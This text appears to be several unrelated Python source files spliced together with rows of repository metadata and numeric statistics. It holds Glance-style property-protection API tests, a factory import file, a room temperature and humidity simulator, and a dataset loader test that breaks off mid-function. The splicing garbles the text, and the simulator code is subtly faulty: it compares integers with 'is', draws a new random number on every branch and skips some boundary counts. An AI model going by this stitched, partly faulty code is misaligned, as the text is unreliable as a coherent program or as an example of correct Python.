'X-Auth-Token': 'user1:tenant1:spl_role',
}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(404, response.status)
def test_property_protections_special_chars(self):
# Enable property protection
self.config(property_protection_file=self.property_file)
self.init()
CREATE_HEADERS = {
'X-Subject-Meta-Name': 'MySubject',
'X-Subject-Meta-disk_format': 'raw',
'X-Subject-Meta-container_format': 'ovf',
'X-Subject-Meta-Is-Public': 'True',
'X-Subject-Meta-Owner': 'tenant2',
'X-Subject-Meta-Size': '0',
}
# Create an subject
auth_headers = {
'X-Auth-Token': 'user1:tenant1:member',
}
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
# Verify both admin and unknown role can create properties marked with
# '@'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_all_permitted_admin': '1'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
subject = jsonutils.loads(content)
self.assertEqual('1',
subject['subject']['properties']['x_all_permitted_admin'])
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
custom_props = {
'X-Subject-Meta-Property-x_all_permitted_joe_soap': '1',
'X-Glance-Registry-Purge-Props': 'False'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
subject = jsonutils.loads(content)
self.assertEqual(
'1', subject['subject']['properties']['x_all_permitted_joe_soap'])
# Verify both admin and unknown role can read properties marked with
# '@'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertEqual('1', response.get(
'x-subject-meta-property-x_all_permitted_admin'))
self.assertEqual('1', response.get(
'x-subject-meta-property-x_all_permitted_joe_soap'))
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertEqual('1', response.get(
'x-subject-meta-property-x_all_permitted_admin'))
self.assertEqual('1', response.get(
'x-subject-meta-property-x_all_permitted_joe_soap'))
# Verify both admin and unknown role can update properties marked with
# '@'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_all_permitted_admin': '2',
'X-Glance-Registry-Purge-Props': 'False'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
subject = jsonutils.loads(content)
self.assertEqual('2',
subject['subject']['properties']['x_all_permitted_admin'])
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
custom_props = {
'X-Subject-Meta-Property-x_all_permitted_joe_soap': '2',
'X-Glance-Registry-Purge-Props': 'False'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
subject = jsonutils.loads(content)
self.assertEqual(
'2', subject['subject']['properties']['x_all_permitted_joe_soap'])
# Verify both admin and unknown role can delete properties marked with
# '@'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_all_permitted_joe_soap': '2',
'X-Glance-Registry-Purge-Props': 'True'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
subject = jsonutils.loads(content)
self.assertNotIn('x_all_permitted_admin', subject['subject']['properties'])
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
custom_props = {
'X-Glance-Registry-Purge-Props': 'True'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
subject = jsonutils.loads(content)
self.assertNotIn('x_all_permitted_joe_soap',
subject['subject']['properties'])
# Verify neither admin nor unknown role can create a property protected
# with '!'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_none_permitted_admin': '1'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
custom_props = {
'X-Subject-Meta-Property-x_none_permitted_joe_soap': '1'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
# Verify neither admin nor unknown role can read properties marked with
# '!'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_none_read': '1'
}
auth_headers.update(custom_props)
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertRaises(KeyError,
response.get, 'X-Subject-Meta-Property-x_none_read')
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertRaises(KeyError,
response.get, 'X-Subject-Meta-Property-x_none_read')
# Verify neither admin nor unknown role can update properties marked
# with '!'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_none_update': '1'
}
auth_headers.update(custom_props)
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_none_update': '2'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
custom_props = {
'X-Subject-Meta-Property-x_none_update': '2'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
# Verify neither admin nor unknown role can delete properties marked
# with '!'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Subject-Meta-Property-x_none_delete': '1'
}
auth_headers.update(custom_props)
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
custom_props = {
'X-Glance-Registry-Purge-Props': 'True'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
auth_headers = {
'X-Auth-Token': 'user1:tenant1:joe_soap',
}
custom_props = {
'X-Glance-Registry-Purge-Props': 'True'
}
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
| 43.070934 | 83 | 0.581255 | 8,195 | 74,685 | 5.200976 | 0.061379 | 0.093614 | 0.042795 | 0.067993 | 0.844212 | 0.822744 | 0.790155 | 0.764394 | 0.743184 | 0.717141 | 0 | 0.020072 | 0.292241 | 74,685 | 1,733 | 84 | 43.095788 | 0.786262 | 0.135449 | 0 | 0.748433 | 0 | 0 | 0.204205 | 0.071207 | 0 | 0 | 0 | 0.000577 | 0.235893 | 1 | 0.020376 | false | 0.000784 | 0.007837 | 0 | 0.030564 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1b188256cd13000c43a51f60ba1caa819fd5b5cb | 139 | py | Python | backend/tests/factories/__init__.py | willrp/willorders-ws | de0757d8888dab41095c93500a6a88c813755530 | [
"MIT"
] | null | null | null | backend/tests/factories/__init__.py | willrp/willorders-ws | de0757d8888dab41095c93500a6a88c813755530 | [
"MIT"
] | null | null | null | backend/tests/factories/__init__.py | willrp/willorders-ws | de0757d8888dab41095c93500a6a88c813755530 | [
"MIT"
] | null | null | null | from .product_factory import ProductFactory
from .order_factory import OrderFactory
from .order_product_factory import OrderProductFactory
| 34.75 | 54 | 0.892086 | 16 | 139 | 7.5 | 0.5 | 0.325 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086331 | 139 | 3 | 55 | 46.333333 | 0.944882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1b24139cbad046b25b4ee689dc198a48ac7919c5 | 21,119 | py | Python | regression/TempHumModule/RoomSimulation.py | SmartRoomCorporation/SmartRoom | 2266c7da49d7d57be913274b0823ea1b91c6f4d8 | [
"MIT"
] | null | null | null | regression/TempHumModule/RoomSimulation.py | SmartRoomCorporation/SmartRoom | 2266c7da49d7d57be913274b0823ea1b91c6f4d8 | [
"MIT"
] | 3 | 2020-12-22T09:06:02.000Z | 2021-01-08T17:01:40.000Z | regression/TempHumModule/RoomSimulation.py | SmartRoomCorporation/SmartRoom | 2266c7da49d7d57be913274b0823ea1b91c6f4d8 | [
"MIT"
] | 2 | 2021-01-08T16:38:01.000Z | 2021-01-08T16:44:59.000Z | from random import randrange
class RoomSimulation():
day = 1339 # MAX
count = 0 # MOMENTO CORRENTE
temperature = 16.3
humidity = 19.8
morning = 719
people = 0
max_people = 6
# range 0 - 719 GIORNO
# range 720 - 1339 NOTTE
def genTemperature(self):
if(self.count <= self.morning): #16.3 - 20.0
#GIORNO
if(self.count <= self.morning):
if(self.count > 0 and self.count <= 143): #16.3 - 17.8
if(self.count / 36 < 1): # primo pezzo
if(randrange(6) is 0): self.temperature = 16.4
if(randrange(6) is 1): self.temperature = 16.5
if(randrange(6) is 2): self.temperature = 16.7
if(randrange(6) is 3): self.temperature = 16.8
if(randrange(6) is 4): self.temperature = 16.6
if(randrange(6) is 5): self.temperature = 16.3
if(self.count / 36 >= 1): # secondo pezzo
if(randrange(6) is 0): self.temperature = 16.7
if(randrange(6) is 1): self.temperature = 17.1
if(randrange(6) is 2): self.temperature = 17.0
if(randrange(6) is 3): self.temperature = 16.9
if(randrange(6) is 4): self.temperature = 16.8
if(randrange(6) is 5): self.temperature = 16.7
if(self.count / 36 >= 2): # terzo pezzo
if(randrange(6) is 0): self.temperature = 17.0
if(randrange(6) is 1): self.temperature = 16.9
if(randrange(6) is 2): self.temperature = 17.3
if(randrange(6) is 3): self.temperature = 17.4
if(randrange(6) is 4): self.temperature = 16.9
if(randrange(6) is 5): self.temperature = 17.2
if(self.count / 36 >= 3): # quarto pezzo
if(randrange(6) is 0): self.temperature = 17.4
if(randrange(6) is 1): self.temperature = 17.5
if(randrange(6) is 2): self.temperature = 17.8
if(randrange(6) is 3): self.temperature = 17.6
if(randrange(6) is 4): self.temperature = 17.7
if(randrange(6) is 5): self.temperature = 17.4
elif(self.count > 144 and self.count <= 287): #17.5 - 18.6
if(self.count / 36 >= 4): # primo pezzo
if(randrange(6) is 0): self.temperature = 17.5
if(randrange(6) is 1): self.temperature = 17.7
if(randrange(6) is 2): self.temperature = 17.9
if(randrange(6) is 3): self.temperature = 17.6
if(randrange(6) is 4): self.temperature = 17.7
if(randrange(6) is 5): self.temperature = 17.8
if(self.count / 36 >= 5): # secondo pezzo
if(randrange(6) is 0): self.temperature = 17.8
if(randrange(6) is 1): self.temperature = 17.7
if(randrange(6) is 2): self.temperature = 17.9
if(randrange(6) is 3): self.temperature = 18.0
if(randrange(6) is 4): self.temperature = 18.1
if(randrange(6) is 5): self.temperature = 18.0
if(self.count / 36 >= 6): # terzo pezzo
if(randrange(6) is 0): self.temperature = 18.0
if(randrange(6) is 1): self.temperature = 18.1
if(randrange(6) is 2): self.temperature = 18.2
if(randrange(6) is 3): self.temperature = 18.3
if(randrange(6) is 4): self.temperature = 18.4
if(randrange(6) is 5): self.temperature = 18.2
if(self.count / 36 >= 7): # quarto pezzo
if(randrange(6) is 0): self.temperature = 18.3
if(randrange(6) is 1): self.temperature = 18.4
if(randrange(6) is 2): self.temperature = 18.5
if(randrange(6) is 3): self.temperature = 18.6
if(randrange(6) is 4): self.temperature = 18.5
if(randrange(6) is 5): self.temperature = 18.4
elif(self.count > 288 and self.count <= 431): #18.6 - 20
if(self.count / 36 >= 8): # primo pezzo
if(randrange(6) is 0): self.temperature = 18.8
if(randrange(6) is 1): self.temperature = 18.7
if(randrange(6) is 2): self.temperature = 18.9
if(randrange(6) is 3): self.temperature = 19.0
if(randrange(6) is 4): self.temperature = 19.1
if(randrange(6) is 5): self.temperature = 19.0
if(self.count / 36 >= 9): # secondo pezzo
if(randrange(6) is 0): self.temperature = 19.2
if(randrange(6) is 1): self.temperature = 19.3
if(randrange(6) is 2): self.temperature = 19.4
if(randrange(6) is 3): self.temperature = 19.6
if(randrange(6) is 4): self.temperature = 19.7
if(randrange(6) is 5): self.temperature = 19.5
if(self.count / 36 >= 10): # terzo pezzo
if(randrange(6) is 0): self.temperature = 20.0
if(randrange(6) is 1): self.temperature = 19.9
if(randrange(6) is 2): self.temperature = 19.8
if(randrange(6) is 3): self.temperature = 19.6
if(randrange(6) is 4): self.temperature = 19.7
if(randrange(6) is 5): self.temperature = 19.5
if(self.count / 36 >= 11): # quarto pezzo
if(randrange(6) is 0): self.temperature = 19.2
if(randrange(6) is 1): self.temperature = 19.3
if(randrange(6) is 2): self.temperature = 19.4
if(randrange(6) is 3): self.temperature = 19.6
if(randrange(6) is 4): self.temperature = 19.7
if(randrange(6) is 5): self.temperature = 19.5
elif(self.count > 432 and self.count <= 575): #17.5 - 19.0
if(self.count / 36 >= 12): # primo pezzo
if(randrange(6) is 0): self.temperature = 19.0
if(randrange(6) is 1): self.temperature = 18.9
if(randrange(6) is 2): self.temperature = 18.7
if(randrange(6) is 3): self.temperature = 18.6
if(randrange(6) is 4): self.temperature = 18.7
if(randrange(6) is 5): self.temperature = 18.8
if(self.count / 36 >= 13): # secondo pezzo
if(randrange(6) is 0): self.temperature = 18.3
if(randrange(6) is 1): self.temperature = 18.5
if(randrange(6) is 2): self.temperature = 18.4
if(randrange(6) is 3): self.temperature = 18.3
if(randrange(6) is 4): self.temperature = 18.5
if(randrange(6) is 5): self.temperature = 18.2
if(self.count / 36 >= 14): # terzo pezzo
if(randrange(6) is 0): self.temperature = 18.0
if(randrange(6) is 1): self.temperature = 18.1
if(randrange(6) is 2): self.temperature = 17.9
if(randrange(6) is 3): self.temperature = 17.8
if(randrange(6) is 4): self.temperature = 18.0
if(randrange(6) is 5): self.temperature = 17.8
if(self.count / 36 >= 15): # quarto pezzo
if(randrange(6) is 0): self.temperature = 17.8
if(randrange(6) is 1): self.temperature = 17.7
if(randrange(6) is 2): self.temperature = 17.6
if(randrange(6) is 3): self.temperature = 17.5
if(randrange(6) is 4): self.temperature = 17.7
if(randrange(6) is 5): self.temperature = 17.5
elif(self.count > 576 and self.count <= 719): #16.3 - 17.8
if(self.count / 36 >= 16): # primo pezzo
if(randrange(6) is 0): self.temperature = 17.6
if(randrange(6) is 1): self.temperature = 17.5
if(randrange(6) is 2): self.temperature = 17.6
if(randrange(6) is 3): self.temperature = 17.4
if(randrange(6) is 4): self.temperature = 17.7
if(randrange(6) is 5): self.temperature = 17.5
if(self.count / 36 >= 17): # secondo pezzo
if(randrange(6) is 0): self.temperature = 17.4
if(randrange(6) is 1): self.temperature = 17.3
if(randrange(6) is 2): self.temperature = 17.2
if(randrange(6) is 3): self.temperature = 17.2
if(randrange(6) is 4): self.temperature = 17.1
if(randrange(6) is 5): self.temperature = 17.3
if(self.count / 36 >= 18): # terzo pezzo
if(randrange(6) is 0): self.temperature = 16.8
if(randrange(6) is 1): self.temperature = 17.0
if(randrange(6) is 2): self.temperature = 17.1
if(randrange(6) is 3): self.temperature = 17.0
if(randrange(6) is 4): self.temperature = 16.8
if(randrange(6) is 5): self.temperature = 16.9
if(self.count / 36 >= 19): # quarto pezzo
if(randrange(6) is 0): self.temperature = 16.7
if(randrange(6) is 1): self.temperature = 16.4
if(randrange(6) is 2): self.temperature = 16.3
if(randrange(6) is 3): self.temperature = 16.5
if(randrange(6) is 4): self.temperature = 16.5
if(randrange(6) is 5): self.temperature = 16.6
#NOTTE
#elif(self.count > self.morning and self.count <= self.day):
# return False
self.count += 1
elif(self.count > self.morning):
self.count = 0
self.genTemperature()
def genHumidity(self):
if(self.count <= self.morning): #18.8 - 24.0
#GIORNO
if(self.count <= self.morning):
if(self.count > 0 and self.count <= 143): #19.8 - 22.5
if(self.count / 36 < 1): # primo pezzo
if(randrange(6) is 0): self.humidity = 18.9
if(randrange(6) is 1): self.humidity = 18.8
if(randrange(6) is 2): self.humidity = 18.9
if(randrange(6) is 3): self.humidity = 19.7
if(randrange(6) is 4): self.humidity = 19.5
if(randrange(6) is 5): self.humidity = 19.3
if(self.count / 36 >= 1): # secondo pezzo
if(randrange(6) is 0): self.humidity = 19.5
if(randrange(6) is 1): self.humidity = 19.6
if(randrange(6) is 2): self.humidity = 19.3
if(randrange(6) is 3): self.humidity = 19.5
if(randrange(6) is 4): self.humidity = 19.6
if(randrange(6) is 5): self.humidity = 19.7
if(self.count / 36 >= 2): # terzo pezzo
if(randrange(6) is 0): self.humidity = 20.0
if(randrange(6) is 1): self.humidity = 20.5
if(randrange(6) is 2): self.humidity = 20.3
if(randrange(6) is 3): self.humidity = 20.7
if(randrange(6) is 4): self.humidity = 20.9
if(randrange(6) is 5): self.humidity = 20.7
if(self.count / 36 >= 3): # quarto pezzo
if(randrange(6) is 0): self.humidity = 21.0
if(randrange(6) is 1): self.humidity = 20.9
if(randrange(6) is 2): self.humidity = 21.4
if(randrange(6) is 3): self.humidity = 21.5
if(randrange(6) is 4): self.humidity = 21.3
if(randrange(6) is 5): self.humidity = 21.1
elif(self.count > 144 and self.count <= 287): #22.3 - 24.7
if(self.count / 36 >= 4): # primo pezzo
if(randrange(6) is 0): self.humidity = 21.3
if(randrange(6) is 1): self.humidity = 21.5
if(randrange(6) is 2): self.humidity = 21.4
if(randrange(6) is 3): self.humidity = 21.6
if(randrange(6) is 4): self.humidity = 21.7
if(randrange(6) is 5): self.humidity = 21.5
if(self.count / 36 >= 5): # secondo pezzo
if(randrange(6) is 0): self.humidity = 21.6
if(randrange(6) is 1): self.humidity = 21.7
if(randrange(6) is 2): self.humidity = 21.8
if(randrange(6) is 3): self.humidity = 21.6
if(randrange(6) is 4): self.humidity = 21.9
if(randrange(6) is 5): self.humidity = 22.1
if(self.count / 36 >= 6): # terzo pezzo
if(randrange(6) is 0): self.humidity = 22.6
if(randrange(6) is 1): self.humidity = 22.5
if(randrange(6) is 2): self.humidity = 22.4
if(randrange(6) is 3): self.humidity = 22.4
if(randrange(6) is 4): self.humidity = 22.8
if(randrange(6) is 5): self.humidity = 22.7
if(self.count / 36 >= 7): # quarto pezzo
if(randrange(6) is 0): self.humidity = 23.0
if(randrange(6) is 1): self.humidity = 23.1
if(randrange(6) is 2): self.humidity = 23.2
if(randrange(6) is 3): self.humidity = 23.4
if(randrange(6) is 4): self.humidity = 23.5
if(randrange(6) is 5): self.humidity = 23.7
elif(self.count > 288 and self.count <= 431): #24.6 - 26
if(self.count / 36 >= 8): # primo pezzo
if(randrange(6) is 0): self.humidity = 23.8
if(randrange(6) is 1): self.humidity = 23.7
if(randrange(6) is 2): self.humidity = 23.9
if(randrange(6) is 3): self.humidity = 24.0
if(randrange(6) is 4): self.humidity = 24.1
if(randrange(6) is 5): self.humidity = 24.2
if(self.count / 36 >= 9): # secondo pezzo
if(randrange(6) is 0): self.humidity = 24.1
if(randrange(6) is 1): self.humidity = 24.3
if(randrange(6) is 2): self.humidity = 24.6
if(randrange(6) is 3): self.humidity = 24.7
if(randrange(6) is 4): self.humidity = 24.4
if(randrange(6) is 5): self.humidity = 24.9
if(self.count / 36 >= 10): # terzo pezzo
if(randrange(6) is 0): self.humidity = 25.0
if(randrange(6) is 1): self.humidity = 24.8
if(randrange(6) is 2): self.humidity = 24.9
if(randrange(6) is 3): self.humidity = 24.5
if(randrange(6) is 4): self.humidity = 24.6
if(randrange(6) is 5): self.humidity = 24.7
if(self.count / 36 >= 11): # quarto pezzo
if(randrange(6) is 0): self.humidity = 23.8
if(randrange(6) is 1): self.humidity = 23.7
if(randrange(6) is 2): self.humidity = 23.9
if(randrange(6) is 3): self.humidity = 24.0
if(randrange(6) is 4): self.humidity = 24.1
if(randrange(6) is 5): self.humidity = 24.2
elif(self.count > 432 and self.count <= 575): #22.3 - 24.7
if(self.count / 36 >= 12): # primo pezzo
if(randrange(6) is 0): self.humidity = 23.0
if(randrange(6) is 1): self.humidity = 23.1
if(randrange(6) is 2): self.humidity = 23.2
if(randrange(6) is 3): self.humidity = 23.4
if(randrange(6) is 4): self.humidity = 23.5
if(randrange(6) is 5): self.humidity = 23.7
if(self.count / 36 >= 13): # secondo pezzo
if(randrange(6) is 0): self.humidity = 22.6
if(randrange(6) is 1): self.humidity = 22.5
if(randrange(6) is 2): self.humidity = 22.4
if(randrange(6) is 3): self.humidity = 22.4
if(randrange(6) is 4): self.humidity = 22.8
if(randrange(6) is 5): self.humidity = 22.7
if(self.count / 36 >= 14): # terzo pezzo
if(randrange(6) is 0): self.humidity = 21.6
if(randrange(6) is 1): self.humidity = 21.7
if(randrange(6) is 2): self.humidity = 21.8
if(randrange(6) is 3): self.humidity = 21.6
if(randrange(6) is 4): self.humidity = 21.9
if(randrange(6) is 5): self.humidity = 22.1
if(self.count / 36 >= 15): # quarto pezzo
if(randrange(6) is 0): self.humidity = 21.3
if(randrange(6) is 1): self.humidity = 21.5
if(randrange(6) is 2): self.humidity = 21.4
if(randrange(6) is 3): self.humidity = 21.6
if(randrange(6) is 4): self.humidity = 21.7
if(randrange(6) is 5): self.humidity = 21.5
elif(self.count > 576 and self.count <= 719): #19.8 - 22.5
if(self.count / 36 >= 16): # primo pezzo
if(randrange(6) is 0): self.humidity = 21.0
if(randrange(6) is 1): self.humidity = 20.9
if(randrange(6) is 2): self.humidity = 21.4
if(randrange(6) is 3): self.humidity = 21.5
if(randrange(6) is 4): self.humidity = 21.3
if(randrange(6) is 5): self.humidity = 21.1
if(self.count / 36 >= 17): # secondo pezzo
if(randrange(6) is 0): self.humidity = 20.0
if(randrange(6) is 1): self.humidity = 20.5
if(randrange(6) is 2): self.humidity = 20.3
if(randrange(6) is 3): self.humidity = 20.7
if(randrange(6) is 4): self.humidity = 20.9
if(randrange(6) is 5): self.humidity = 20.7
if(self.count / 36 >= 18): # terzo pezzo
if(randrange(6) is 0): self.humidity = 19.5
if(randrange(6) is 1): self.humidity = 19.6
if(randrange(6) is 2): self.humidity = 19.3
if(randrange(6) is 3): self.humidity = 19.5
if(randrange(6) is 4): self.humidity = 19.6
if(randrange(6) is 5): self.humidity = 19.7
if(self.count / 36 >= 19): # quarto pezzo
if(randrange(6) is 0): self.humidity = 18.9
if(randrange(6) is 1): self.humidity = 18.8
if(randrange(6) is 2): self.humidity = 18.9
if(randrange(6) is 3): self.humidity = 19.7
if(randrange(6) is 4): self.humidity = 19.5
if(randrange(6) is 5): self.humidity = 19.3
#NOTTE
#elif(self.count > self.morning and self.count <= self.day):
# return False
self.count += 1
elif(self.count > self.morning):
self.count = 0
self.genHumidity()
def addPerson(self):
if(self.people < self.max_people): self.people += 1
def removePerson(self):
if(self.people > 0): self.people -= 1 | 61.751462 | 74 | 0.453431 | 2,702 | 21,119 | 3.543301 | 0.027387 | 0.275747 | 0.300815 | 0.35095 | 0.964069 | 0.963443 | 0.957489 | 0.957176 | 0.78943 | 0.75987 | 0 | 0.124265 | 0.428429 | 21,119 | 342 | 75 | 61.751462 | 0.668876 | 0.041385 | 0 | 0.716088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012618 | false | 0 | 0.003155 | 0 | 0.041009 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
1b3fe430d12eef7af63e23f7f486223378ec0e09 | 4,686 | py | Python | tests/test_loaders.py | returntocorp/inputset-generator | c33952cc5683e9e70b24f76936c42ec8e354d121 | [
"MIT"
] | 3 | 2019-11-02T20:14:34.000Z | 2020-01-23T21:47:20.000Z | tests/test_loaders.py | returntocorp/inputset-generator | c33952cc5683e9e70b24f76936c42ec8e354d121 | [
"MIT"
] | 19 | 2019-09-18T01:48:07.000Z | 2021-11-04T11:20:48.000Z | tests/test_loaders.py | returntocorp/inputset-generator | c33952cc5683e9e70b24f76936c42ec8e354d121 | [
"MIT"
] | 3 | 2019-11-15T22:31:13.000Z | 2020-03-10T10:19:39.000Z | import os
from dotenv import load_dotenv
from r2c_isg.structures import Dataset
load_dotenv()
CACHE_DIR = '../.requests_cache'
def test_import_inputset():
# test github
ds = Dataset.import_inputset(
'files/git_repo.json',
registry='github',
cache_dir=CACHE_DIR,
debug=True,
github_pat=os.getenv('GITHUB_PAT')
)
ds.update(**{'name': 'test', 'version': '1.0'})
ds.backup('../test.p')
ds = Dataset.restore('../test.p')
ds.export_inputset('../test.json')
ds = Dataset.import_inputset(
'files/git_repo_commit.json',
registry='github',
cache_dir=CACHE_DIR,
debug=True,
github_pat=os.getenv('GITHUB_PAT')
)
ds.update(**{'name': 'test', 'version': '1.0'})
ds.backup('../test.p')
ds = Dataset.restore('../test.p')
ds.export_inputset('../test.json')
# test npm
ds = Dataset.import_inputset(
'files/name_version.json',
registry='npm',
cache_dir=CACHE_DIR,
debug=True
)
ds.update(**{'name': 'test', 'version': '1.0'})
ds.backup('../test.p')
ds = Dataset.restore('../test.p')
ds.export_inputset('../test.json')
# test pypi
ds = Dataset.import_inputset(
'files/name_version.json',
registry='pypi',
cache_dir=CACHE_DIR,
debug=True
)
ds.update(**{'name': 'test', 'version': '1.0'})
ds.backup('../test.p')
ds = Dataset.restore('../test.p')
ds.export_inputset('../test.json')
# test vanilla
ds = Dataset.import_inputset(
'files/http_url.json',
cache_dir=CACHE_DIR,
debug=True
)
ds.update(**{'name': 'test', 'version': '1.0'})
ds.backup('../test.p')
ds = Dataset.restore('../test.p')
ds.export_inputset('../test.json')
# cleanup files
os.remove('../test.p')
os.remove('../test.json')
def test_load_file():
# test github
ds = Dataset.load_file(
'files/git_urls_commits.csv',
registry='github',
cache_dir=CACHE_DIR,
debug=True,
github_pat=os.getenv('GITHUB_PAT')
)
ds.update(**{'name': 'test', 'version': '1.0'})
ds.backup('../test.p')
ds = Dataset.restore('../test.p')
ds.export_inputset('../test.json')
# test npm
ds = Dataset.load_file(
'files/names_versions.csv',
registry='npm',
cache_dir=CACHE_DIR,
debug=True
)
ds.update(**{'name': 'test', 'version': '1.0'})
ds.backup('../test.p')
ds = Dataset.restore('../test.p')
ds.export_inputset('../test.json')
# test pypi
ds = Dataset.load_file(
'files/names_versions.csv',
registry='pypi',
cache_dir=CACHE_DIR,
debug=True
)
ds.update(**{'name': 'test', 'version': '1.0'})
ds.backup('../test.p')
ds = Dataset.restore('../test.p')
ds.export_inputset('../test.json')
# test vanilla
ds = Dataset.load_file(
'files/urls.csv',
cache_dir=CACHE_DIR,
debug=True
)
ds.update(**{'name': 'test', 'version': '1.0'})
ds.backup('../test.p')
ds = Dataset.restore('../test.p')
ds.export_inputset('../test.json')
# cleanup files
os.remove('../test.p')
os.remove('../test.json')
def test_load_weblist():
# test github
ds = Dataset.load_web(
'top1kstarred',
registry='github',
from_type='list',
cache_dir=CACHE_DIR,
debug=True,
github_pat=os.getenv('GITHUB_PAT')
)
ds.trim(10)
ds.get_projects_meta()
ds.get_project_versions(historical='latest')
ds.update(**{'name': 'test', 'version': '1.0'})
ds.backup('../test.p')
ds = Dataset.restore('../test.p')
ds.export_inputset('../test.json')
# test npm
ds = Dataset.load_web(
'allbydependents',
registry='npm',
from_type='list',
cache_dir=CACHE_DIR,
debug=True
)
ds.trim(10)
